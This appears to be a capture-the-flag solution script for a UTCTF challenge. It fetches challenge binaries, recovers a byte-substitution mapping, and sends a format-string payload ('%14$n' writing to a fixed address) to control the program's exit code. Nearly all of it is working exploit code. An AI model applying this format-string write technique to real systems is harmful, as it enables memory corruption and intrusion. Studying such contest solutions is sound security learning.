# exp of Automated Exploit Generation 2 A little crypto(substitution) + pwn. ```python import os from pwn import * context.arch='amd64' context.terminal=['tmux','split','-h'] #p=process('./pwn') #gdb.attach(p,'b *0x40131f') #%49$p def get_bins(): ct = 0 for x in range(30): p=remote("pwn.utctf.live",5002) p.read() p.sendline("") data = p.readuntil("\n\n") with open(f"./demos/{ct}.hex",'w') as f: f.write(data[:-1].decode()) p.close() os.system(f"xxd -r ./demos/{ct}.hex > ./bins/{ct}") ct +=1 def pay_gen(re=0): res = b'' for x in range(0x200): tmp = x %0x100 if (re and x>=0x100): tmp = (-tmp) %0x100 if tmp == 0x0a: if re: tmp =0x1 else: tmp = 2 if tmp == 0x0: if re: tmp =0x2 else: tmp = 0x1 res+= tmp.to_bytes(1,"big") return res def run_bin(input,path="./bins/0"): p = process(path) p.sendline(input) res = p.read()[:-1] p.close() return res def exp(input,path='./bins/0'): p = process(path) gdb.attach(p) p.sendline(input) p.interactive() def tester(path="./bins/0"): pos = [] res = run_bin(pay_gen(),path) for x in range(0x100): if x == 0 or x == 0xa: pos.append(-1) continue tmp = [] for y in range(0x200): if x == res[y]: tmp.append(y) pos.append(tmp) pos2 = [] res = run_bin(pay_gen(-1),path) for x in range(0x100): if x == 0 or x == 0xa: pos2.append(-1) continue tmp = [] for y in range(0x200): if x == res[y]: tmp.append(y) pos2.append(tmp) # 1 and 2 res = [-1]*0x200 for _ in range(1,3): for i in pos[_]: if i in pos2[_]: res[_] = i pos[_].remove(i) pos2[_].remove(i) break # 0xa for i in pos[2]: if i in pos2[1]: res[0xa] = i pos[2].remove(i) pos2[1].remove(i) break # 0x101 for i in pos[1]: if i not in pos2[2]: res[0x101] = i pos[1].remove(i) break # 0x1fe for i in pos2[2]: if i not in pos[1]: res[0x1fe] = i pos2[2].remove(i) break #print(pos) #print(pos2) #print("="*0x200) for x in range(0x100): if pos[x] == -1: pass elif len(pos[x]) == 4: pass elif len(pos[x]) == 2 and x>2: if pos[x][0] in pos2[x]: # this one is correct res[x] = pos[x][0] res[x+0x100] = pos[x][1] else: res[x] = pos[x][1] res[x+0x100] = pos[x][0] #print(res) rrr = [1]*0x200 rrr[0] = 0x11 rrr[0x100] = 0x22 rrr[0x102] = 0x33 rrr[0x10a] = 0x44 pay=b'' for x in rrr: pay+=x.to_bytes(1,'big') tmp = run_bin(pay,path) res[0]=tmp.index(b'\x11') res[0x100]=tmp.index(b'\x22') res[0x102]=tmp.index(b'\x33') res[0x10a]=tmp.index(b'\x44') #print(res) mapping = [] for x in range(0x200): mapping.append(res.index(x)) return mapping def convert(pay,mapping): res = [-1]*0x200 for x in range(0x200): res[mapping[x]] = pay[x] ppp = b'' for x in range(0x200): ppp+=res[x].to_bytes(1,'big') return ppp def do_test(): res = tester("./bins/29") payload = b"%c%14$n".ljust(0x30,b'\1')+p64(0x40405C) payload=payload.ljust(0x200,b'\1') payload = convert(payload,res) exp(payload,"./bins/29") def main(): p=remote("pwn.utctf.live",5002) p.read() p.sendline("") while(1): data = p.readuntil("\n\n") with open(f"./demos/cur.hex",'w') as f: f.write(data[:-1].decode()) os.system(f"xxd -r ./demos/cur.hex > ./bins/cur") p.readuntil("Binary should exit with code ") ret_val = int(p.readline()[:-1]) if ret_val: payload = f"%{ret_val}c%14$n".encode().ljust(0x30,b'\1')+p64(0x40405C) else: payload = b"%14$n".ljust(0x30,b'\1')+p64(0x40405C) payload=payload.ljust(0x200,b'\1') payload = convert(payload,tester("./bins/cur")) context.log_level='debug' p.sendlineafter(": \n",payload) p.readline() p.interactive() main() ```